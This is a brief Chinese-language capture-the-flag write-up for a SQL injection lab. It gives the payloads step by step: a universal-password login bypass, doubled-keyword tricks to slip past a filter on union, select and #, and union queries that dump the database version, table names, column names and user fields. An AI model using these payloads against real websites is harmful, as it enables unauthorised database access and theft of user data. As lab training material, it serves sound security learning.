1.打开靶场,先万能密码登陆试试:admin' or '1'='1' #
不对报错,可以看到url:那就用hackbar插件即可
http://247a799f-8fd9-4124-9ddfcheck.php?username=admin%27+or+%271%27%3D%271%27+%23&password=1232.找闭合‘,提示报错;提示进行了过滤,我们就常规尝试一下过滤了什么:说明union select 和#都被过滤了,那就选择双写/编码替换
1' ununionion seselectlect 1,2,3%23发现回显2,3;就可以正常注入了
3.依次爆破
1.版本和库名 1' ununionion seselectlect 1,version(),database()%23 [10.3.18-MariaDB,geek 2.表名' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23 [b4bsql,geekuser 3.列名1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='geekuser'%23 4.字段' ununionion seselectlect 1,2,group_concat(username) frfromom geekuser%23 发现不是,就去看看b4bsql库 如过显示不全可以command+u看源代码